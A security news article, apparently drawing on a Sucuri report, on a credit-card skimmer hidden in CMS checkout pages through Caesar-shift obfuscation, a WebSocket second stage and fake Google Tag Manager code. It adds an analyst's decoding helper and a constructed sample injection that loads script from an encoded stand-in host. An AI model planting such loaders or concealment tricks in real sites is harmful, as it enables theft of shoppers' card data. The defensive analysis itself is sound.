Caesar Cipher Skimmer Used to Compromise E-stores Based on Popular CMS

Recent weeks have seen a new variation of the "gtag" credit card skimming attack with a high number of detections, named by Sucuri researchers as the "Caesar Cipher Skimmer". This new skimmer is notably being deployed across various popular content management systems (CMS) simultaneously, including WordPress, Magento, and OpenCart.

This latest campaign involves maliciously modifying the checkout PHP page of the WooCommerce plugin for WordPress to steal credit card data. Sucuri researchers have noted that while it is common to see malware recycled between CMS, it is unusual to see it deployed across various platforms simultaneously.

Threat actors used the substitution mechanism of the Caesar cipher to encode the malware and conceal the domain hosting the malicious payload. This is achieved by subtracting three from the Unicode code point of each character, a simple encoding that makes the string harder to read at a glance while remaining trivial for the injected script to reverse at runtime.
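To show what the shift-by-three encoding looks like in practice, here is an added triage helper (not Sucuri's code and not taken from the skimmer) that reverses the shift and pulls decoded URL-like strings out of an injected snippet. The sample injection and the host name in it are constructed for the example.

```javascript
// Added example (not Sucuri's code): reverses the shift-by-three obfuscation
// described above so an analyst can read the strings hidden in an injected script.
// The sample below is constructed; no real skimmer domain is used.

// Shift every code point of `text` by `shift`. The skimmer encodes with -3
// (each character minus three), so decoding applies +3.
function caesarShift(text, shift) {
  let out = "";
  for (const ch of text) {
    out += String.fromCodePoint(ch.codePointAt(0) + shift);
  }
  return out;
}

const encodeMinus3 = (text) => caesarShift(text, -3);
const decodePlus3 = (text) => caesarShift(text, 3);

// Pull quoted string literals out of a script snippet and decode each one with
// the given shift. Only candidates that decode to something URL- or script-like
// are reported, which keeps ordinary literals ('script', '') out of the result.
function recoverHiddenStrings(scriptSource, shift = 3) {
  const literal = /(["'])((?:(?!\1)[^\\]|\\.)*)\1/g;
  const found = [];
  let m;
  while ((m = literal.exec(scriptSource)) !== null) {
    const decoded = caesarShift(m[2], shift);
    if (/https?:\/\/|wss?:\/\/|\.js\b/.test(decoded)) {
      found.push({ encoded: m[2], decoded });
    }
  }
  return found;
}

// Constructed snippet in the shape the article describes: the loader URL is stored
// with every character shifted down by three and shifted back up at runtime.
const SAMPLE_INJECTION = `var s=document.createElement('script');
s.src="eqqmp7,,phfjjbo*elpq+bu^jmib,dq^d+gp".split('').map(c=>String.fromCharCode(c.charCodeAt(0)+3)).join('');
document.head.appendChild(s);`;

if (typeof require !== "undefined" && require.main === module) {
  console.log(recoverHiddenStrings(SAMPLE_INJECTION));
}
```

Running the block prints the single recovered URL from the constructed snippet; pointing `recoverHiddenStrings` at a real injected file and trying a few shift values is the same workflow.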

The domain hosting the malicious code was likely compromised in previous attacks, but researchers also observed the use of rogue sites set up by the attackers. The attackers registered some domains with intentional spelling mistakes, which suggests that they intend to swap out domains when they are discovered by security vendors.

The script employed in the campaign loads another layer of obfuscated skimmer JavaScript, which creates a WebSocket, connects to a remote server, and waits to receive the second layer of the skimmer. This script sends the URL of the current page, allowing the attackers to send customized responses for each infected site.

Researchers noted that some versions of the second-layer script even check whether it is being loaded by a logged-in WordPress user and modify the response for them, indicating advanced malware capabilities. Comments written in Russian were found in older versions of the script, suggesting that Russian-speaking threat actors may be behind the attacks.

In recent months, injections have been modified to appear less suspicious by mimicking Google Analytics and Google Tag Manager. The experts also observed attackers misusing the Insert Headers and Footers WPCode plugin to insert malware into WooCommerce websites.

On Magento websites, attackers frequently use the core_config_data database table to store credit card skimming JavaScript, but no specific cases have yet been seen for OpenCart. Users are advised to keep their sites up to date, review admin accounts, keep passwords updated, leverage file integrity and website monitoring, and protect their sites with a web application firewall.

Sucuri researchers wrote in a recent post that "Caesar Cipher Skimmer" is used to compromise multiple CMS, including WordPress, Magento, and OpenCart. The post also stated that the malware campaign involves maliciously modifying the checkout PHP page of the WooCommerce plugin for WordPress to steal credit card data.

Sucuri researchers also observed attackers misusing the Insert Headers and Footers WPCode plugin to insert malware into WooCommerce websites. This plugin has become popular among attackers for inserting server-side redirects.